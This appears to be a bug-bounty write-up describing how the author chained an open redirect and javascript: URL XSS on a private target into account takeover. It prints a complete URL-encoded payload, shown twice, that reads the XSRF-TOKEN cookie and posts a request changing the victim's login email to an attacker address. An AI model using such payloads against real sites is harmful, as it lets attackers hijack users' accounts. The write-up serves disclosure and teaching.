Hello everyone, I hope you are well. In this article I will show you how I escalated XSS to Account Takeover. Since the target is private, let’s call as target.com.
The Open Redirect
I started testing target and register the account, while register, I can create my own subdomain for the organization like ownsubdomain.target.com. Then I logged in to the dashboard. Not long after, I found the url endpoint like this https://ownsubdomain.target.com/overview/?ccpa_redirect=
Then i tried to open redirect like this https://ownsubdomain.target.com/overview/?ccpa_redirect=https://evil.com and it was successfully, i was redirected to evil.com page :D. Then I tried to use this XSS payload javascript:alert(1); and opened in the browser, and yeah the XSS popped up.
Chaining the XSS to Account Takeover
After that, I didn’t immediately report the bug. I’m thinking of upgrading this XSS to a more severe impact. Shortly, I found a form that can change my email, like this
But there was an CSRF-TOKEN protection. Then I remember that I had read a writeup about Chaining the XSS to severe impact. So, I make the payload for change my email and bypassed the CSRF-TOKEN protection with XSS vulnerability. The payload was like this :
javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://ownsubdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed');
So, when I visited this URL https://ownsubdomain.target.com/overview/?ccpa_redirect=javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://subdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed'); in browser, the alert will popped up and the email will changed.
Then I reported this to the program, but I got duplicate :(
I hope you are enjoyed my writeup, keep learning and stay safe.
Tips :
Don’t be quick to report any bugs you find, always look for more severe impacts.
